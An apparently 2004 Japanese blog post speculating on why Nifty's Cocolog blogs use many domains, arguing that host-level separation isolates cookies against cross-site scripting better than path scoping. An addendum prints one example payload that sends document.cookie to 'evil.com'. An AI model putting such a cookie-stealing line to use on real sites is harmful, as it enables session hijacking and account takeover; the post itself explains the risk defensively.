philosophical(旧)

古い記事にトラックバック:p。
元祖しゃちょう日記 : niftyのココログの不思議なドメイン。

なんで、ドメインをいちいち変えてるんでしょう？
パッと見た限りで、こんなドメインがありました。

http://trott.cocolog-nifty.com/
http://hugo-sb.way-nifty.com/hugo_sb/
http://okinawa-sanpin.tea-nifty.com/cfs/
http://os2.air-nifty.com/ecs/
http://kumaneko.moe-nifty.com/blog/
http://kugikemi.txt-nifty.com/tsugimoto/

cocolog-nifty.comはまぁしょうがないと思うのですが、
後のドメインはいったい、、、

ネタにマジレス…ってかネタじゃなくてほんとに不思議みたいなので思っていたことを書いてみます。
ドメインが複数個あるのは単にユーザ数が増えたときの名前の衝突を避ける為でしょうね。
また、上記のようにホスト名レベルでユーザが区別されていると、cookie の有効範囲をドメイン制約のみで安全に隔離できるという利点があります。
cookie の有効範囲指定としては PATH　による指定も可能ですが、実は PATH　による cookie 有効範囲指定はそのドメイン上で多岐のサービスを提供している場合は非常に脆弱です。

参考：クロスサイトスクリプティングとcookieの有効path

同一ドメイン上の他のサービスにクロスサイトスクリプティングと呼ばれる脆弱性があった場合、そのドメイン上の任意の cookie が盗まれ得ます。
ひろゆきさんが利用されている livedoor blog は、
http://blog.livedoor.jp/hirox1492/
のような URL　になっています。
livedoor blog の編集画面の仕様は知らないのですが、もしこのドメイン上で cookie を発行することで認証状態を記憶できるようになっているとしたら、blog.livedoor.jp 上のどこかのページにクロスサイトスクリプティング脆弱性があった場合、アカウント乗っ取りが可能になります。

他にも理由はあるかもしれませんが、私が直感的に思った範囲では、そんな点からしてもユーザ空間をドメイン(ホスト)のレイヤで分けるのは安全性の高い方式である、と思います。

とはいえ、nifty の他のサービスはユーザ空間をドメイン名レイヤで分けているわけでもないので、nifty がこういう脅威に備えてそうしたかは怪しいですが^^;。

そうそう、参考繋がり^^;で、高木さんの日記が久々に更新されてましたのでご紹介～。
きっとこのページがリンク元になるのも意義があるはず:p。

(追記)
はっっ！！よくよく考えたらココログの場合、cookie を利用する編集画面は https://app.cocolog-nifty.com/ ではないか…。ってことは上記とは無関係に他人のアカウント乗っ取りの可能性はあるってわけだ-_-。
まぁもともとは PATH 単位でサーバを切り分けるのが面倒とかの理由でホストで分けたんだろうとは思ってたけど…。せっかくいい手段だと思ったのにねぇ-_-。

あ、念のため、https://app.cocolog-nifty.com/ のどこかに第三者から script を送り込めるような脆弱性がない限り、cookie は盗まれないです。が、もし以下のような URL を編集ページ上から叩かれるような手段が存在したら、認証済み状態が盗まれます。
javascript:document.location="http://evil.com/"+document.cookie

(追記:2004/02/09)
ネタもとを失念してしまいましたが_o_、複数ドメインに分けていることで、ココログ同士のリンクが異なるドメインにまたがることになり、それは SEO 効果がある、という話がありました。
www.nifty.com のようなランクの高いページからリンクされていること以上に有望な説ですね。
だからといって、nifty がその効果を考えてドメインを分けたとは思えませんけどね^^;。